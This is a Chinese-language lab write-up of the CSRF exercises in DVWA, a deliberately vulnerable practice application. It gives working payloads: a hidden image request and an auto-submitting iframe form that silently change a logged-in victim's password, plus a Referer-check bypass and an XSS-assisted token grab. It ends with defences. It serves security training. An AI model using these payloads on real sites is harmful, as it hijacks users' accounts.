DVWA-csrf测试

首先附上之前看到的文章的一些方法

https://www.freebuf.com/articles/web/118352.html

CSRF（Cross-site request forgery）跨站请求伪造，也被称为“One Click Attack”或者Session Riding，通常缩写为CSRF或者XSRF，是一种对网站的恶意利用。尽管听起来像跨站脚本（XSS），但它与XSS非常不同，XSS利用站点内的信任用户，而CSRF则通过伪装成受信任用户的请求来利用受信任的网站。与XSS攻击相比，CSRF攻击往往不大流行（因此对其进行防范的资源也相当稀少）和难以防范，所以被认为比XSS更具危险性。

结合burp演示

low

 

 

意思就是攻击者首先获取到修改密码时的攻击链接，并且生成一个表单，当受害者点击这个按钮时（受害者在此网站有cookie，并且服务器有验证身份），便发送了更改密码的请求，导致自己的密码被changed，但是这样很明显，受害者点进页面后，看到了password changed。那如何才能更隐蔽的发送这个request呢，上文连接中提到了一种方法，就是隐藏的img src标签，并且设置为不可见(Low 没有设置referer检验)

代码如下

<img src="http://192.168.153.130/dvwa/vulnerabilities/csrf/?password_new=hack&password_conf=hack&Change=Change#" border="0" style="display:none;"/>

<h1>404<h1>

<h2>file not found.<h2>

但其实已经发送了request过去了，并且password changed

 

 

Medium

看源码，是增加了referer的检验，检验referer是否包含host参数即主机参数

referer头的用处是表示来源地址

增加这种检验的防御是因为，同时攻击者是把攻击连接放在自己的服务器上使受害者点击，如果有referer检验的话，当受害者点击链接时，referer显示的来源地址是攻击者网址，所以能够一定的防御。

但是仍然可以绕过

攻击者可以把网页改名为主机名字，如图

成功绕过了referer的检验

 

 

 

High 的话建议看上面链接中的文章(转载连接在上面)

要绕过High级别的反CSRF机制，关键是要获取token，要利用受害者的cookie去修改密码的页面获取关键的token。

试着去构造一个攻击页面，将其放置在攻击者的服务器，引诱受害者访问，从而完成CSRF攻击，下面是代码。

<script type="text/javascript">

    function attack()

  {

   document.getElementsByName('user_token')[0].value=document.getElementById("hack").contentWindow.document.getElementsByName('user_token')[0].value;

  document.getElementById("transfer").submit(); 

  }

</script>

 

<iframe src="http://192.168.153.130/dvwa/vulnerabilities/csrf" id="hack" border="0" style="display:none;">

</iframe>

 

<body onload="attack()">

  <form method="GET" id="transfer" action="http://192.168.153.130/dvwa/vulnerabilities/csrf">

   <input type="hidden" name="password_new" value="password">

    <input type="hidden" name="password_conf" value="password">

   <input type="hidden" name="user_token" value="">

  <input type="hidden" name="Change" value="Change">

   </form>

</body>

攻击思路是当受害者点击进入这个页面，脚本会通过一个看不见框架偷偷访问修改密码的页面，获取页面中的token，并向服务器发送改密请求，以完成CSRF攻击。

 

然而理想与现实的差距是巨大的，这里牵扯到了跨域问题，而现在的浏览器是不允许跨域请求的。这里简单解释下跨域，我们的框架iframe访问的地址是http://192.168.153.130/dvwa/vulnerabilities/csrf，位于服务器192.168.153.130上，而我们的攻击页面位于黑客服务器10.4.253.2上，两者的域名不同，域名B下的所有页面都不允许主动获取域名A下的页面内容，除非域名A下的页面主动发送信息给域名B的页面，所以我们的攻击脚本是不可能取到改密界面中的user_token。

 

由于跨域是不能实现的，所以我们要将攻击代码注入到目标服务器192.168.153.130中，才有可能完成攻击。下面利用High级别的XSS漏洞协助获取Anti-CSRF token（因为这里的XSS注入有长度限制，不能够注入完整的攻击脚本，所以只获取Anti-CSRF token）。

 

 

 

这里的Name存在XSS漏洞，于是抓包，改参数，成功弹出token

 

 

 

注入代码如下

 

 

Impossible 级别的代码利用PDO技术防御SQL注入，至于防护CSRF，则要求用户输入原始密码（简单粗暴），攻击者在不知道原始密码的情况下，无论如何都无法进行CSRF攻击

 

附上一些防护措施    https://www.cnblogs.com/hyddd/archive/2009/04/09/1432744.html

　　　　　　　　　　在客户端添加伪随机数

• 随机token
• referer头验证